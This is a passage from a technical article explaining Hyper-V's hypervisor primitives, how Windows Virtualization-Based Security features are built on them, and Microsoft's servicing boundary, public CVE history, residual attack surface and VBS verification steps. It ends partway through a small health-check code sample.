Hypercalls are how partitions request services from the hypervisor. The TLFS documents two flavors. A fast hypercall passes its parameters inline in CPU registers: on x64, rcx carries a 64-bit hypercall input value (the low 16 bits are the call code; the upper 48 bits are a control word with fields for the Fast flag, variable-header size, Rep Count, and Rep Start Index), rdx carries the first input parameter, and r8 carries the second. A slow hypercall instead passes the GPA (guest physical address) of an input-parameter page in rdx, and the GPA of an output-parameter page in r8; the actual parameter content lives in those pages. The instruction that triggers the hypercall is vmcall on Intel and vmmcall on AMD; the hypervisor maps both onto the same internal entry point [@ms-tlfs-pdf].

A guest-to-hypervisor call. The guest issues `vmcall` (Intel) or `vmmcall` (AMD); the CPU traps via VM-EXIT into the hypervisor in VMX root mode; the hypervisor reads the call code from `rcx`, reads the inputs from registers (fast) or from a GPA-pointed page (slow), services the request, writes outputs back, and returns via VM-ENTRY. Hypercalls are the only legitimate way for a partition to invoke hypervisor services [@ms-tlfs-pdf].

{// A JavaScript model of the rcx hypercall input value layout. // In a real hypercall the guest sets rcx, rdx, r8 and issues vmcall / vmmcall. function packHypercallInput({ callCode, fastFlag, varHeaderSize, isNested, repCount, repStartIdx }) { // rcx layout (TLFS section 3 "Hypercall Interface", verbatim bit map) // bits 0..15 Call Code // bit 16 Fast (1 = inline params in rdx/r8) // bits 17..26 Variable header size (in QWORDs) // bits 27..30 RsvdZ // bit 31 Is Nested // bits 32..43 Rep Count // bits 44..47 RsvdZ // bits 48..59 Rep Start Index // bits 60..63 RsvdZ let rcx = 0n; rcx |= BigInt(callCode) & 0xFFFFn; if (fastFlag) rcx |= 1n << 16n; rcx |= (BigInt(varHeaderSize) & 0x3FFn) << 17n; if (isNested) rcx |= 1n << 31n; rcx |= (BigInt(repCount) & 0xFFFn) << 32n; rcx |= (BigInt(repStartIdx) & 0xFFFn) << 48n; return rcx; } // HvCallPostMessage = 0x005C, fast hypercall (TLFS section 11) const rcx = packHypercallInput({ callCode: 0x005C, fastFlag: 1, varHeaderSize: 0, isNested: 0, repCount: 0, repStartIdx: 0, }); console.log('rcx = 0x' + rcx.toString(16).padStart(16, '0')); // Output: rcx = 0x000000000001005c}

The call-code space is small and well-documented: a few hundred codes, each one a structured request with typed inputs and outputs. The hypercall path is also where the most consequential 2024 Hyper-V CVE lived. CVE-2024-21407 was a use-after-free in hvix64.exe's handling of a specific file-operation hypercall, the rare case where the bug was in the hypervisor binary itself rather than in a root-partition driver [@nvd-cve-2024-21407].

7.3 Intercepts

Intercepts are how the hypervisor virtualizes guest behavior. The TLFS distinguishes four categories: instruction intercepts (CPUID, MSR reads/writes, I/O-port instructions), exception intercepts (page faults, general protection faults), memory-access intercepts (a guest tries to read or write a specific guest-physical-address region), and partition-state intercepts (a guest hits a state that the hypervisor wants to be notified about). Each is configured per-partition through the Intel VMCS execution-control bits or the AMD VMCB control fields [@ms-tlfs-pdf].

A configurable hypervisor notification on a specific guest event. The hypervisor programs the VMCS or VMCB to fire a VM-EXIT when the guest issues a particular instruction, raises a particular exception, accesses a particular memory region, or transitions to a particular state. Intercepts are the policy mechanism that lets the hypervisor implement device emulation, security checks, and VTL transitions [@ms-tlfs-pdf].

For VBS, the load-bearing intercept is the memory-access intercept. When VTL0 code tries to access a region whose VTL0 SLAT mapping is unreadable or unwritable, the access traps to the hypervisor with the offending GPA; the hypervisor can deliver the intercept to the VTL1 Secure Kernel as a secure call, letting VTL1 see what VTL0 was trying to do and decide whether to allow it. This is how HVCI's W^X enforcement is wired: a VTL0 page that is marked writable in VTL0's SLAT is marked non-executable in the same SLAT; an attempt to switch the same page to executable becomes a memory-access intercept that VTL1 must approve.

7.4 The Synthetic Interrupt Controller (SynIC)

The Synthetic Interrupt Controller, SynIC, is the hypervisor's per-virtual-processor event delivery surface. Each VP has 16 Synthetic Interrupt Source (SINT) lines, a message page (where the hypervisor places message-shaped events), an event-flag page (where it places bit-flag events), and a set of synthetic timers. SynIC is the bus on which VMBus traffic between VSP and VSC moves; it is also the bus on which VTL transitions between VTL0 and VTL1 are delivered inside the root partition [@ms-tlfs-pdf].

A hypervisor-emulated interrupt controller, parallel to the hardware APIC, that delivers hypervisor-originated events to a virtual processor. Each VP has 16 SINT lines, a message page, an event-flag page, and synthetic timers. VMBus signaling rides on SynIC; secure-call delivery between VTL0 and VTL1 rides on SynIC; vTPM, virtual-PCI, and other paravirtualized device events ride on SynIC [@ms-tlfs-pdf].

For VBS, the secure-call ABI -- the way VTL0 code asks VTL1 to do something -- is built on SynIC. A VTL0 caller writes a request into a shared message page, signals a SINT, and yields the CPU; the hypervisor switches SLAT context to VTL1, delivers the message, and lets VTL1 read the request. When VTL1 finishes, it signals a SINT back to VTL0 and the hypervisor switches contexts again. Credential Guard's whole communication path between VTL0 LSASS and VTL1 LSAISO is one of these secure-call channels.

7.5 Memory and per-VTL SLAT

The last surface is also the most important: memory. Guest physical addresses (GPAs) are translated to system physical addresses (SPAs) by per-partition SLAT page tables. The hypervisor has exclusive control of these tables; no partition, including the root, can read or modify them directly. For VBS specifically, the hypervisor maintains two SLAT mappings per partition -- one for VTL0 and one for VTL1 -- and switches between them on VTL transitions.

This is the architectural reason VTL0 kernel mode, even with full Ring-0 code execution, cannot read or execute VTL1 memory. The VTL0 page-table walker on a load from a VTL1-only page does not see the page at all; the SLAT walker on the host returns no mapping; the hardware MMU raises an EPT/NPT violation; the hypervisor handles the violation according to the VTL0 partition's intercept policy. In the security-relevant case, the hypervisor delivers an access-denied result to VTL0 and continues. There is no kernel-mode mov instruction sequence that can defeat this, because the gating happens in hardware page-table walks that VTL0 kernel mode cannot influence.

Five surfaces. Two of them -- the hypercall ABI and the device-emulation paths that surface over VMBus -- are where every public Hyper-V escape since 2018 has lived. The other three (intercepts, SynIC, per-VTL SLAT) are the substrate on which VBS, HVCI, Credential Guard, and System Guard Secure Launch are built. We turn to those next.

8. How the Hypervisor Enforces Each VBS Feature

The hypervisor itself does not know anything about credentials, code signing, application allowlisting, or DMA protection. It knows about partitions, VTLs, intercepts, SLAT entries, and hypercalls. Each Windows security feature is built by composing those primitives in a specific way. The mapping is precise and worth walking, because it is what makes the substrate a security primitive rather than just a virtualization product [@ms-hardware-root-of-trust].

HVCI / Memory Integrity. Hypervisor-protected Code Integrity is the most consequential VBS feature on a per-byte basis: it changes Windows from a system that lets the kernel execute any signed driver to one where the kernel cannot execute any page until VTL1 has approved it. VTL1's code-integrity service inspects every kernel-mode page mapping change request before the SLAT entry that would make the page executable in VTL0 is granted. The W^X invariant -- a single page can be writable or executable, but never both -- is enforced not by NT kernel cooperation but by the per-VTL SLAT, exactly as described in section 7.5. An NT-kernel attempt to mark a writable page executable becomes a memory-access intercept that VTL1's CI service evaluates [@ms-enable-vbs-hvci]. The hypervisor primitives composed: per-VTL SLAT + memory-access intercepts + secure-call ABI.

A user-mode process that runs inside VTL1's Isolated User Mode (IUM). Trustlets must be signed with the Windows System Component Verification certificate (Signature Level 12) and carry the IUM EKU `1.3.6.1.4.1.311.10.3.37`. The shipping inbox trustlets include `LSAISO.EXE` (Credential Guard), `VMSP.EXE` (host side of virtual TPM), and the vTPM provisioning trustlet [@ms-iso-user-mode-trustlets, @ionescu-bh-2015].

Credential Guard. LSAISO.EXE -- the LSA-Isolated trustlet -- runs in VTL1 Isolated User Mode. NTLM password hashes and Kerberos Ticket-Granting Tickets that LSASS used to keep in normal VTL0 memory are moved to VTL1 memory that VTL0 cannot read. VTL0 LSASS performs credential operations by sending a request to LSAISO over a secure-call channel mediated by the hypervisor's SynIC; LSAISO does the cryptographic work and returns a result. The plaintext of the credential never leaves VTL1. This is why a Ring-0 attacker on a Credential Guard-enabled Windows install cannot dump LSASS hashes -- they aren't in LSASS [@ms-iso-user-mode-trustlets]. The hypervisor primitives composed: per-VTL SLAT (to hide LSAISO's memory) + SynIC (to deliver secure calls) + intercepts (to catch VTL0 attempts to access LSAISO memory). See the sibling Credential Guard / NTLMless article for VTL1 internals.

The VTL0-to-VTL1 calling convention. A VTL0 caller fills in a shared parameter page, signals a SynIC interrupt configured for VTL transition, and yields. The hypervisor switches SLAT context to VTL1, delivers the message, and lets the Secure Kernel dispatch it via `IumInvokeSecureService` to a registered VTL1 service. On return, the hypervisor switches contexts back. The whole round-trip is mediated by hypervisor primitives the calling VTL cannot bypass [@ionescu-bh-2015].

Application Control (WDAC). The same VTL1 code-integrity service that backs HVCI also evaluates user-mode policy. When VTL0 user mode tries to load a binary that is restricted by WDAC policy, the load becomes a secure call into VTL1; VTL1's policy engine evaluates the signature, the certificate chain, and the configured policy; the secure call returns approval or denial. WDAC policy lives in VTL1, the policy database lives in VTL1, and a VTL0 administrator who has been compromised cannot edit either. The hypervisor primitives composed: same as HVCI, plus a richer secure-call API for policy evaluation.

VBS Enclaves. A third-party application can load native code into a VTL1 IUM enclave. The enclave executes in VTL1, with its memory hidden from VTL0; the application talks to the enclave through a secure-call ABI exposed by the Secure Kernel. Architecturally parallel to Credential Guard but available to ordinary application developers. The hypervisor primitives composed: per-VTL SLAT (to hide enclave memory) + secure-call ABI (to invoke enclave code) + a Secure Kernel API for enclave creation, attestation, and destruction.

System Guard Secure Launch (DRTM). Intel TXT's SENTER instruction (and AMD's SKINIT on AMD platforms) executes a hardware-rooted dynamic measurement of the hypervisor and the Secure Kernel into TPM PCRs 17-22 after firmware initialization [@ms-system-guard-secure-launch]. This re-establishes the trust root post-firmware: a pre-boot firmware compromise that survived UEFI Secure Boot cannot silently poison the hypervisor's launch state without showing up as an unexpected measurement in a PCR that VTL1 can read. The hypervisor primitives composed: DRTM event registration with the hardware + TPM PCR extension + a VTL1-side attestation API. See the sibling Secure Boot article for the static-RTM half of the same story.

Kernel DMA Protection. External devices over Thunderbolt, USB4, or hot-plug PCIe can issue DMA to arbitrary physical addresses, bypassing the CPU's MMU entirely. The hypervisor configures the IOMMU (Intel VT-d / AMD-Vi) to deny DMA from externally-attached devices outside of explicitly-authorized memory regions, and to refuse DMA from any device before its kernel-mode driver has been loaded under a trusted policy [@ms-kernel-dma-protection]. The hypervisor primitives composed: hypervisor-owned IOMMU configuration + memory-access intercepts on the IOMMU configuration MMIO region.

The shape of the table is the point.

Feature	Composed primitives	Verbatim hypervisor mechanism
HVCI	per-VTL SLAT + memory-access intercepts + secure-call ABI	VTL1 vets each VTL0 page-mapping change before granting +X
Credential Guard	per-VTL SLAT + SynIC + intercepts	LSAISO trustlet memory absent from VTL0 SLAT mapping
WDAC (AppControl)	secure-call ABI + VTL1 policy engine	VTL0 binary load = secure call into VTL1 CI service
VBS Enclaves	per-VTL SLAT + secure-call ABI	Third-party VTL1 IUM enclave invoked over secure call
System Guard Secure Launch	hardware DRTM (TXT/SKINIT) + TPM PCR extension	`SENTER` / `SKINIT` measures hypervisor into PCRs 17-22
Kernel DMA Protection	hypervisor-owned IOMMU + MMIO intercepts	VT-d/AMD-Vi denies DMA outside authorized regions

The hypervisor knows nothing about NTLM hashes, Kerberos tickets, code-signing certificates, WDAC policy XML, or DMA-region authorization. All of that policy lives in VTL1 -- in the Secure Kernel, in LSAISO, in the WDAC service. The hypervisor only provides the *mechanism* for one piece of policy to evaluate a request from another piece of policy in isolation. This is the architectural separation that lets the hypervisor binary stay small and the Windows-side security feature set keep growing.

The pattern: each feature is a different composition of the same five primitives (partitions, hypercalls, intercepts, SynIC, per-VTL SLAT). The hypervisor is genuinely a primitive in the formal sense -- a small set of mechanisms that compose into many security policies. If the hypervisor is the mechanism, the boundary the hypervisor enforces is the contract. Microsoft commits to servicing certain attacks against that boundary and explicitly excludes others. To know what we are getting, we need to read the contract.

9. The Security Boundary Microsoft Commits To

The Microsoft Security Servicing Criteria for Windows is a public document. It enumerates which classes of attack Microsoft will issue a CVE and an out-of-band patch for, and which it will not. For the hypervisor, the document is unusually specific [@ms-msrc-servicing-criteria].

The two relevant boundaries:

Hypervisor / virtualization boundary. An L1-guest-to-host or guest-to-guest break is a serviced boundary. If a guest VM can execute code in the root partition or in another guest's address space, Microsoft will issue a CVE.
Virtual Secure Mode (VBS) boundary. VTL0 kernel-mode code reading or writing VTL1 memory, or executing VTL1 code, is a serviced break. If a Ring-0 attacker in VTL0 can defeat the per-VTL SLAT, Microsoft will issue a CVE.

What the servicing criteria does not commit to is also worth naming. A same-VTL elevation of privilege inside a guest (a guest user becoming guest SYSTEM) is not a hypervisor break -- it is a Windows EoP, serviced under the Windows kernel boundary, not the hypervisor boundary. A denial-of-service of the host from a guest is generally not a serviced hypervisor break unless it produces a memory corruption that an attacker can ride to RCE. An administrator in the root partition reading guest memory is not a break at all -- the root partition is part of the hypervisor's TCB by definition, and root-partition admin is hypervisor-admin in the threat model.

The dollar figures for these boundaries are documented in the Microsoft Hyper-V Bounty Program [@ms-msrc-bounty-hyperv]. The program ranges from $5,000 for the lowest-impact qualifying submission up to $250,000 for the highest. The eligibility language is verbatim:

An eligible submission includes a Remote Code Execution (RCE) vulnerability in Microsoft Hyper-V that enables a L1 guest virtual machine to compromise the hypervisor, escape from the guest virtual machine to the host, or escape to another L1 guest virtual machine. -- Microsoft Hyper-V Bounty Program [@ms-msrc-bounty-hyperv]

$250,000 is the highest standing Hyper-V bounty in the industry. Comparable programs from the other major hypervisor vendors do not publish the same calibration. KVM is a community project with no vendor-paid bounty pool of equivalent size. Xen is a Linux Foundation project that runs a bug bounty through HackerOne but does not publicly attach a $250,000 figure to a guest-to-host RCE. ESXi (Broadcom) does not publish a standing bounty program with a per-bug ceiling; bounty payments for ESXi RCEs typically flow through Pwn2Own and similar marketplaces, where Trend Micro's Zero Day Initiative sets the prize for any given competition.The bounty calibration is itself a data point. If $250,000 were too high, Microsoft would be drowning in submissions; if it were too low, the public CVE record would show more hypervisor breaks reported through Pwn2Own than directly to MSRC. The current equilibrium -- two to four Microsoft-direct Hyper-V CVEs per year, plus zero Pwn2Own Hyper-V guest-to-host escapes through Pwn2Own Berlin 2025 [@zdi-pwn2own-day3] -- is consistent with the bounty being calibrated roughly correctly relative to the cost of finding a real bug.

Vendor	Hypervisor	Published bounty	Ceiling	Servicing-criteria boundary published
Microsoft	Hyper-V / `hvix64.exe`	Yes	$250,000	Yes, verbatim language
Xen Project	Xen	Yes (HackerOne)	Lower, varies	Yes, security policy
KVM	KVM (community)	No standing program	--	No vendor-published criteria
Broadcom/VMware	ESXi	No standing public bounty	--	Vendor advisories per CVE
seL4 Project	seL4	No (proof-rooted argument)	--	Functional-correctness proof [@sel4-whitepaper]

The seL4 row is included because seL4 is the only hypervisor in the table whose claim to a security boundary is mathematical rather than operational. seL4 ships approximately ten thousand lines of C and assembly with a machine-checked proof of functional correctness against a higher-level specification. The proof took roughly twenty-five person-years and covers a microkernel that does not by itself ship the full surface area of Hyper-V. The Microsoft hypervisor is unverified at the §7-estimated line count an order of magnitude larger; its security argument is operational (a small TCB, heavy fuzzing, a standing bounty, public servicing) rather than mathematical.

A serviced boundary is a contract. Contracts are not promises; they are obligations that come due when an attacker finds a way around them. To see what the contract has actually had to pay out, we read the public CVE record.

10. The Public Track Record -- Six Worked CVEs Across Three Classes

We do not need an exhaustive Hyper-V CVE catalog to understand the boundary's real shape. Six worked examples, drawn from three distinct attack classes, cover every public failure mode the boundary has produced since 2018. We walk them in order.

Class A: Device emulation in the root partition

CVE-2021-28476 (vmswitch.sys, May 2021, CVSS 9.9). Discovered by Ophir Harpaz at Guardicore Labs and Peleg Hadar at SafeBreach Labs using Guardicore's hAFL1 hypervisor fuzzer, this was a guest-controlled OID_SWITCH_NIC_REQUEST OID parameter passed to the host-side vmswitch.sys driver. The driver dereferenced an attacker-influenced object pointer; the host kernel performed an arbitrary pointer dereference; the guest gained RCE in the root partition's kernel mode. The CVSS 9.9 score (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) reflects guest-to-host RCE with Azure-scale blast radius: the bug was reachable from the vmswitch driver shipped in Windows builds well before the May 2021 patch, per the Guardicore Labs technical analysis [@nvd-cve-2021-28476]. The bug is the canonical anchor for "device emulation in the root partition is the largest Hyper-V attack surface."

CVE-2025-21333 (NT Kernel Integration VSP, January 2025, CWE-122). The first publicly-acknowledged in-the-wild exploited Hyper-V CVE. The "Hyper-V NT Kernel Integration VSP" is a relatively new component that ties the Windows kernel-mode container architecture to Hyper-V's VSP/VSC pattern. A guest-controlled input triggered a heap-based buffer overflow on the host side of the integration; the host's address space was corruptible from a guest [@nvd-cve-2025-21333]. The operational pattern matches the vmswitch family: a host-side component receives structured, attacker-shaped input from a guest, and the host-side component overflows.

Class B: The hypercall input-validation path

CVE-2024-21407 (Hyper-V hypercall UAF, March 2024, CVSS 8.1, CWE-416). The rare case where the bug is in hvix64.exe / hvax64.exe itself, not in a root-partition driver. A guest crafted specially-formed file-operation hypercalls; the hypervisor dereferenced freed memory; the guest gained arbitrary host code execution [@nvd-cve-2024-21407].

CVE-2024-30092 (Hyper-V RCE, October 2024, CWE-20 + CWE-829). A Hyper-V remote code execution that combined improper input validation with inclusion of functionality from an untrusted control sphere -- another hypercall-path-class bug [@nvd-cve-2024-30092].

CVE-2024-49117 (Hyper-V RCE, December 2024, CVSS 8.8). A third 2024 Hyper-V RCE; the December Patch Tuesday entry rounded out a year in which three publicly-disclosed Hyper-V RCEs landed in twelve months, the most since the 2018 vmswitch family [@nvd-cve-2024-49117].

Class C: VTL0-to-VTL1 (the VBS break, not the hypervisor break)

CVE-2020-0917 and CVE-2020-0918 -- Amar and King, Black Hat USA 2020. Saar Amar and Daniel King's "Breaking VSM by Attacking SecureKernel" disclosed two paired vulnerabilities discovered with their Hyperseed hypercall fuzzer retargeted at securekernel!IumInvokeSecureService, the secure-call entry point. Vulnerability #1 -- which maps to CVE-2020-0917 -- is an out-of-bounds write in securekernel!SkmmObtainHotPatchUndoTable, the function that parses the hot-patch undo table at secure-call invocation time.The Black Hat USA 2020 deck (verified via pdftotext at the canonical MSRC-Security-Research GitHub URL) explicitly labels Vulnerability #1 as OOB Write, in slides titled "The Vulnerable Function" and "The OOB" in the "Hardening SK" section [@amar-king-bh-2020]. Several secondary writeups across the web have transcribed the bug class as "OOB read," which is incorrect; the deck itself is the primary source and says write. The functions involved are also commonly conflated: IumInvokeSecureService is the secure-call dispatcher Hyperseed retargets to reach the buggy code; the actual bug is in SkmmObtainHotPatchUndoTable. The NVD entries for both CVEs are tracked as CWE-269 (Improper Privilege Management). Vulnerability #2 -- CVE-2020-0918 -- is a design flaw in SkmmUnmapMdl that lets VTL0 pass a fully attacker-controlled Memory Descriptor List to SkmiReleaseUnknownPTEs.

The Microsoft response is documented end-to-end in the same deck: the Secure Kernel pool was migrated to segment heap in mid-2019, four W+X regions were reduced to +X only, and SkpgContext -- a HyperGuard equivalent for Secure Kernel -- was introduced.

This is a different failure class than vmswitch RCE: not guest-to-host, but VTL0-to-VTL1 -- a Secure Kernel break reached through the hypervisor's secure-call dispatch from a privileged VTL0 attacker. Microsoft services it under the VBS / VSM boundary in the servicing criteria document, even though no guest VM is involved.

Key idea: Every public Hyper-V CVE since 2018 lives in one of three narrow code paths -- device emulation, hypercall input validation, or VTL0-to-VTL1 secure-call dispatch. The TLFS-visible primitives (intercepts, SynIC, per-VTL SLAT) have produced none.

The Pwn2Own dimension

Through Pwn2Own Berlin 2025, no public live Hyper-V guest-to-host escape has been demonstrated at Pwn2Own. The cross-vendor analogue -- and the industry's best calibration of how hard a hypervisor escape is to find when a researcher has a public dollar incentive and a deadline -- is the first-ever ESXi escape in Pwn2Own history, executed by Nguyen Hoang Thach of STAR Labs SG on Day Two (May 16, 2025) using a single integer overflow vulnerability in the hypervisor's DMA-handling path. The award was $150,000 plus 15 Master of Pwn points; STAR Labs went on to win overall Master of Pwn for the competition with $320,000 across three days [@zdi-pwn2own-day3].

The technique class is a TOCTOU on a length field read twice during a DMA operation: the first read validates the length, the second read uses it; race the second read and you write past a fixed-size buffer on the host heap. The exploit class is structurally the same as the vmswitch family, just landed in a different vendor's device-emulation path.

CVE	Class	Year	CVSS	Location	Source
CVE-2021-28476	A: device emulation	2021	9.9	`vmswitch.sys` (root partition)	[@nvd-cve-2021-28476]
CVE-2025-21333	A: device emulation	2025	7.8	NT Kernel Integration VSP (root partition)	[@nvd-cve-2025-21333]
CVE-2024-21407	B: hypercall path	2024	8.1	`hvix64.exe` / `hvax64.exe` (hypervisor binary)	[@nvd-cve-2024-21407]
CVE-2024-30092	B: hypercall path	2024	7.5	Hyper-V hypercall validation	[@nvd-cve-2024-30092]
CVE-2024-49117	B: hypercall path	2024	8.8	Hyper-V hypercall validation	[@nvd-cve-2024-49117]
CVE-2020-0917/0918	C: VTL0-to-VTL1	2020	6.8 (per MSRC)	`securekernel.exe` (VTL1, reached via secure call)	[@amar-king-bh-2020]

flowchart LR subgraph CA["Class A: device emulation (root partition)"] Vmswitch["vmswitch.sys -- CVE-2021-28476"] Vsp["NT Kernel Integration VSP -- CVE-2025-21333"] end subgraph CB["Class B: hypercall input validation (hypervisor binary)"] UAF["CVE-2024-21407 (UAF)"] Input["CVE-2024-30092"] Hpcall["CVE-2024-49117"] end subgraph CC["Class C: VTL0-to-VTL1 (secure call dispatch)"] Oob["CVE-2020-0917 (OOB write)"] Mdl["CVE-2020-0918 (SkmmUnmapMdl)"] end Guest["Guest VM"] --> CA Guest --> CB Vtl0["Privileged VTL0 (kernel)"] --> CC

This is the third insight the article is built around. The reader's prior model may have been "hypervisors fail in mysterious, deep ways; the boundary is fragile in unknown places." The new model is "every public Hyper-V escape since 2018 lives in one of three narrow code paths, and the TLFS-visible primitives have produced none." The narrowness of the failure space is itself a security argument. The hypervisor's micro-kernelized design has held; what has not always held are the components Microsoft chose to put next to the hypervisor, in the root partition's user mode and kernel mode, by deliberate architectural choice in 2008.

Six worked examples; three classes; one boundary; an unflinching public record. The boundary is alive and producing CVEs at roughly two to four per year. But every CVE so far has lived somewhere the hypervisor itself controls. The interesting question is what lives in places it does not control.

11. The Residual Attack Surface -- Beneath, Beside, and Around

The hypervisor enforces a clean boundary against everything above it -- the NT kernel, user mode, even other guest VMs. It cannot, by construction, enforce anything against what lives below or beside it. Three structural classes of residual attack matter. We walk each.

11.1 Firmware below the hypervisor

System Management Mode (SMM), the UEFI runtime, the platform Manageability Engine (Intel ME), and the AMD Platform Security Processor (PSP) all run at higher privilege than the hypervisor for parts of boot and runtime. SMM in particular is a CPU mode that is invoked through System Management Interrupts (SMI) and has unrestricted access to all of physical memory, including the hypervisor's own pages. If the OEM-supplied SMM handler contains an exploitable bug, an SMI can run attacker code in a privilege mode strictly above the hypervisor's.

The threat is not hypothetical. The Binarly research team's 2023 LogoFAIL disclosures showed entire classes of image-parser bugs in UEFI firmware reachable from a privileged OS context; BootHole (CVE-2020-10713, a buffer overflow in GRUB2's grub.cfg parser) and BlackLotus (CVE-2022-21894, a UEFI Secure Boot bypass) showed that pre-boot bugs in widely-deployed bootloaders could ride past Secure Boot. None of these is a hypervisor bug; all of them are residual attack surface from the hypervisor's point of view.

Microsoft's mitigation is the dynamic root of trust for measurement -- System Guard Secure Launch -- which we touched on in section 8. After UEFI Secure Boot has done its static-RTM job, Intel TXT's SENTER (or AMD's SKINIT) executes a CPU-hardware-rooted late launch: the CPU resets to a known state, runs an Intel- or AMD-signed Authenticated Code Module (ACM), and measures the hypervisor binary into TPM PCRs 17-22 before transferring control to it. The result is that even if pre-boot firmware is compromised, the post-DRTM PCR values reflect the actual hypervisor binary; a compromised UEFI cannot silently substitute a different hypervisor without changing the attestation [@ms-system-guard-secure-launch, @ms-hardware-root-of-trust]. The residual after DRTM: OEMs that don't ship Secure Launch on their motherboards, or that ship buggy SMM handlers that can be invoked after launch.

11.2 Hardware side channels

Microarchitectural side-channel attacks cross the VTL boundary at the level of CPU implementation, not at the level of architectural specification. The 2018 Spectre and Meltdown disclosures -- followed by the L1TF, MDS, Retbleed, and CacheWarp families in the years since -- showed that speculatively-executed code on a CPU can leak microarchitectural state across privilege boundaries that the architectural ISA promises to protect.

Microsoft's mitigation cadence has been in-tree and aggressive: Kernel Virtual Address Shadow (the Windows equivalent of KPTI) for Meltdown; IBRS, STIBP, and retpolines for Spectre v2; HyperClear for L1TF on Hyper-V hosts. Each Patch Tuesday since 2018 has shipped at least one microarchitectural mitigation; cumulatively the cost has been measurable but bounded.

Note: The microarchitectural ceiling is hardware, not software. Intel TDX and AMD SEV-SNP -- the two confidential-computing architectures that move the trust root from the hypervisor to per-VM hardware encryption -- both explicitly disclaim resistance to this class. If the CPU leaks across a Spectre-class side channel, no software-level isolation primitive (VTL, partition, SEAM, SEV-SNP) can fully recover the property. The mitigation is hardware that doesn't leak, and that mitigation arrives one CPU generation at a time.

11.3 IOMMU and DMA bypass

The IOMMU -- Intel VT-d, AMD-Vi -- is the hardware that gates DMA from peripheral devices to physical memory. If the IOMMU is configured correctly, a Thunderbolt-attached device cannot read or write arbitrary memory; it can only DMA to regions the OS has explicitly mapped for it. If the IOMMU is disabled, configured permissively, or has firmware bugs of its own, DMA becomes an end-run around every architectural protection above it -- including the hypervisor's.

The threat is again not hypothetical. Bjorn Ruytenberg's Thunderspy disclosure in 2020 documented seven DMA-class vulnerabilities in Thunderbolt 3 firmware, demonstrating that an attacker with physical access could read or modify arbitrary memory on a powered-on system through a malicious peripheral [@thunderspy]. The Microsoft mitigation is Kernel DMA Protection (Windows 10 1803 and later): the hypervisor configures the IOMMU at boot to deny DMA from externally-attached devices outside of explicitly authorized regions, and DMA from any peripheral whose driver has not been loaded under a trusted policy is refused at the IOMMU [@ms-kernel-dma-protection]. The structural residual: pre-boot DMA, before Windows has finished configuring the IOMMU; client motherboards that still ship with VT-d or AMD-Vi disabled in BIOS; OEMs that disable Kernel DMA Protection by default.

11.4 Hypervisor downgrade and rollback

Alon Leviev's "Windows Downdate" at Black Hat USA 2024 disclosed a class of attack that the prior three sections do not cover: rollback of the hypervisor binary itself to a previously-vulnerable, but still validly-signed, build [@nvd-cve-2024-21302].

The structural argument: UEFI Secure Boot prevents loading an unsigned hvix64.exe. It does not prevent loading an older hvix64.exe that is unsigned only in the sense of being unrevoked. If Microsoft fixes a Secure Kernel bug in build N+1 and a VTL0 attacker can convince the system to load build N at the next reboot, the patched bug is alive again. CVE-2024-21302 demonstrated exactly this rollback against both the hypervisor and the Secure Kernel through manipulation of the Windows Update servicing pipeline. The mitigation is mandatory-update servicing combined with proactive revocation list (dbx) hygiene -- once an older binary's hash is in the UEFI revocation list, Secure Boot will refuse to load it -- and Microsoft completed mitigations across Windows 10 1507 through Windows Server 2019 in the July 8, 2025 update wave [@nvd-cve-2024-21302].

flowchart TD HW["Hardware (CPU, RAM, IOMMU, TPM)"] SM["System Management Mode (Ring -2) -- residual: SMM handler bugs"] FW["UEFI firmware -- residual: LogoFAIL, BootHole, BlackLotus"] DR["DRTM ACM (Intel TXT / AMD SKINIT)"] HV["Microsoft Hypervisor (hvix64 / hvax64)"] Iommu["IOMMU (VT-d / AMD-Vi) -- residual: Thunderspy, pre-boot DMA"] Vtl1["VTL1 (Secure Kernel + trustlets)"] Vtl0["VTL0 (NT kernel + user mode)"] Side["Microarchitectural side channels -- Spectre / Meltdown / MDS / Retbleed"] Update["Windows Update servicing -- residual: hypervisor rollback (CVE-2024-21302)"] HW --> SM SM --> FW FW --> DR DR --> HV HV --> Iommu HV --> Vtl1 HV --> Vtl0 Side -.->|"cross all boundaries"| HV Update -.->|"can roll hypervisor back"| HV The hypervisor is necessary but not sufficient. The firmware-Secure-Boot-DRTM substrate beneath it, the microarchitectural ceiling above it, the IOMMU configuration beside it, and the Windows Update pipeline that decides which hypervisor build runs next are co-equal members of the same boundary. None of them is the hypervisor; all of them have to do their job for the hypervisor's guarantees to hold. The substrate is real, but the boundary is the combination of the substrate and what holds it up.

Necessary, not sufficient. That phrase is the article's honest answer to the question "how good is the substrate?" The answer is that the substrate is genuine, the boundary is published, the bounty calibration is the highest in the industry, the public CVE record is alive and narrow, and the residual attack surface lives in places the hypervisor cannot by construction control. The substrate is what we have explored in detail; what holds it up is what we have just sketched. The last section turns from theory to practice.

12. Practical Guide, FAQ, and Closing

If you have read this far, the natural next question is "is this on, on my machine, and how do I check?" The practical answer is short.

12.1 Enabling and verifying VBS

VBS is configurable through several paths: Group Policy (Computer Configuration > Administrative Templates > System > Device Guard), Intune, MDM CSPs (DeviceGuard/EnableVirtualizationBasedSecurity, DeviceGuard/ConfigureSystemGuardLaunch), the Windows Security UI, or directly via bcdedit /set hypervisorlaunchtype Auto. Verification is best done with three small commands.

msinfo32 -> the Device Guard / Virtualization-based Security row. "Services Configured" lists what policy has requested; "Services Running" lists what is actually active. Kernel DMA Protection and Secure Launch each appear as their own row.
Get-CimInstance -ClassName Win32_DeviceGuard -> VirtualizationBasedSecurityStatus (0 = off, 1 = enabled but not running, 2 = running); SecurityServicesRunning array (HVCI, Credential Guard, etc.); RequiredSecurityProperties (the policy floor).
bcdedit /enum -> hypervisorlaunchtype Auto is the default; loadoptions DISABLE_VBS_* is how an administrator can opt out (you should not see these flags on a properly-configured machine).

{` // Given a parsed Win32_DeviceGuard object, compute whether VBS is healthy. // The actual Win32_DeviceGuard schema is on Microsoft Learn; this is the // decision logic an operator would write against it. function checkVbsHealth(dg) { const result = { ok: false, reasons: [] };

// VBS itself if (dg.VirtualizationBasedSecurityStatus !== 2) { result.reasons.push('VBS is not running (status != 2)'); }

// HVCI (Memory Integrity) if (!dg.SecurityServicesRunning.includes(2)) { result.reasons.push('HVCI / Memory Integrity is not running'); }

// Credential Guard if (!dg.SecurityServicesRunning.includes(1)) { result.reasons.push('Credential Guard is not running'); }

